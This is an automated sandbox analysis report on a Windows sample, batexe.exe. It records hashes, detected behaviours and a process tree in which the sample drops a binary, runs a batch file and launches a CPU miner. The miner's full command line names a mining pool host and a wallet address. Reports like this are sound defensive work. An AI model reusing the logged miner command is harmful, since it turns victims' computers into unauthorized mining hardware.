73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
290s
max time network
307s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24-02-2024 13:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
4280	b2e.exe
1456	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1456	cpuminer-sse2.exe
1456	cpuminer-sse2.exe
1456	cpuminer-sse2.exe
1456	cpuminer-sse2.exe
1456	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2148-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2148 wrote to memory of 4280	2148	batexe.exe	87
PID 2148 wrote to memory of 4280	2148	batexe.exe	87
PID 2148 wrote to memory of 4280	2148	batexe.exe	87
PID 4280 wrote to memory of 4328	4280	b2e.exe	88
PID 4280 wrote to memory of 4328	4280	b2e.exe	88
PID 4280 wrote to memory of 4328	4280	b2e.exe	88
PID 4328 wrote to memory of 1456	4328	cmd.exe	91
PID 4328 wrote to memory of 1456	4328	cmd.exe	91

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Users\Admin\AppData\Local\Temp\A2C8.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\A2C8.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\A2C8.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AD57.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4328
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A2C8.tmp\b2e.exe

Filesize
4.9MB

MD5
2f8f9061964f3ff9d0f60c5b506985d0

SHA1
35f100a08f36d0c9b7eb85c49a0ced82d55e1ed0

SHA256
c8abc2d15d8ba11d4e2c3e65d1509920176e14885477c8603238ae177f9d1dcf

SHA512
abc139a60cacde922d04e3bffa4031c317d4d90eb7d3ce34817630f742711213084d67678448adede4342738371d0a9ad648ebbcd8c54de3444ce8ca5070b9f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\A2C8.tmp\b2e.exe

Filesize
2.4MB

MD5
000f75482a8f3c361e1ef9b58a16ee5f

SHA1
4e67fd460b9fa59dc5c1147833ad2f40f94d0279

SHA256
5143fc3449d84ea5cf510321dc92e2e28e68385863a6b07da646a406b53a875e

SHA512
fe72c633e123cea33c480746a4534fe6228f2c1f6184edbc75c144a201fb556ba0d68415c2abaa9c844a39bb900300f24476e38a4e13825829da54d629eaf152

Download Submit
C:\Users\Admin\AppData\Local\Temp\A2C8.tmp\b2e.exe

Filesize
2.5MB

MD5
35ffee4e793de9e8635fb4a825da13d7

SHA1
33e645756e7bd58ca2b085febdd3abbfc9e0627a

SHA256
46ff93e4e4951c8f7bcd739c955a7175131da5abb67c7e57cf339265aa6f63ab

SHA512
edb5cff501f7558320ba7644d226753cdcee3b2ca390ccd5a218ec3442766aed66d82f12d4d20ce264c89bc1f3f155afc60ee6c2e58f024ff556f65662f3366a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AD57.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
896KB

MD5
9f9a8fea08bacf3a1d155567fead5940

SHA1
9d9ba8746c585446f53f442b800e1eb28a0df86a

SHA256
a22f9d8fb953e4f6bc93cdcc8aa650a5a093f1dd400fdc501d5aa7b00bee0289

SHA512
d41a048619373832c616d48f919595ac50dfbbd68095aec008b30adde91ceeeb86326c7d412ab20d937bab7096fb8165d3da8b4fdc40a03cc32da9ee3e9dc2a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
576KB

MD5
6e18fc4eda8ed0e6aa6ed56f84803ab3

SHA1
e4a0a4432fcf3184baae1b01a8cb771ed580dbe2

SHA256
f51cf1f35d722b4af4bde30de5008d67d7256d271953eeb2ff63780978f4a53f

SHA512
25f97a3a07fd0aed4a5e6bd58e4cc3ebc2c56c0a314103536e9342ee10aa3c01baa24b459fb58d7154808594203e2b4fddc23f6c424182e2e8bb3a978b4dc256

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
581KB

MD5
70cb1017dd8f1574c828c48e22b27ffd

SHA1
42a603cb8f53c2abf463038839d3673870b13402

SHA256
fa04ec0903ec32b49fe036bc9838b658a710341411cc2e1cce53f16bb31d29f7

SHA512
eba64276ebbc1679d1506465a25b4daa9fdf5932e5a68c317a765fae798e91542e09fc7df463ac20acf3b2e01370d3f4df3593b146e12ed284e60c4e14536d02

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
512KB

MD5
a5993c0dd7587f1716037dcfe1f63091

SHA1
9a4d23ce36f5fc5791692b47d977c0bf92842879

SHA256
568cec1e1bdccf401232a78c8ecf2081fdaea221f0a7c777a69ec61307cca3e3

SHA512
c5457590162dc1a0fd6b179ba94f19e6265e2ca226ea1ec553358f568690bbc158335ee92c297ce699b2928d44702733269f82640d86bb499c1981a5903afc12

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
12.6MB

MD5
1a6b03f7b95cb00b964d954a311b3b88

SHA1
0af5b1cafe966b5b01817341574781460e5f0434

SHA256
7c61fd8215264c20e7a6b813166d5e435b566a88a542bd2f5cffc33c2973480f

SHA512
b7f5889a9f6826f4c6f2b2f1d06d4340680066cdc08388248516521b7e93c7a8ac0fe71e5f8328301881f31a97ca5b416d5bd577985db91c6e52d761de762834

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
15.6MB

MD5
7e0ce30809f5886354a5ec5b3c89c15f

SHA1
897de8d3ddb9f04cc69166432fe16f322873d34e

SHA256
18d9bd28201e9fa3576b116ac641dff73cf076a8e022b8dc709e53263e2466a1

SHA512
edf63b7c76072801e45d0555d541c69b942b5f2a1953d907c22ab5b66dc302845cb94537494d27824a55bff7e3586e7fbff333de7312e22d7b3a2459336113e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
12.7MB

MD5
2cfbc53a241e740ec716a5bae1cbb42f

SHA1
231cd313cd1b1c726cc1326c032fec888cd2bafc

SHA256
d29e3fbb1884128eea491247a3a043deafb5cab339e23e66e5fb334bf376c04e

SHA512
6ee46ddef1140514d87f1a2dfe7c09d7fcfa2840214c4835f4e0270c1ba8fbf3b6d9d5da83ce1837ac3a6b96a012b48c1272376c58c7ab019c80cca0dca079f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1456-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1456-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1456-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1456-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1456-45-0x000000006DD20000-0x000000006DDB8000-memory.dmp

Filesize
608KB

Download
memory/1456-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1456-47-0x0000000001160000-0x0000000002A15000-memory.dmp

Filesize
24.7MB

Download
memory/1456-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1456-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1456-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1456-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1456-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1456-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1456-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1456-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2148-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4280-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4280-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download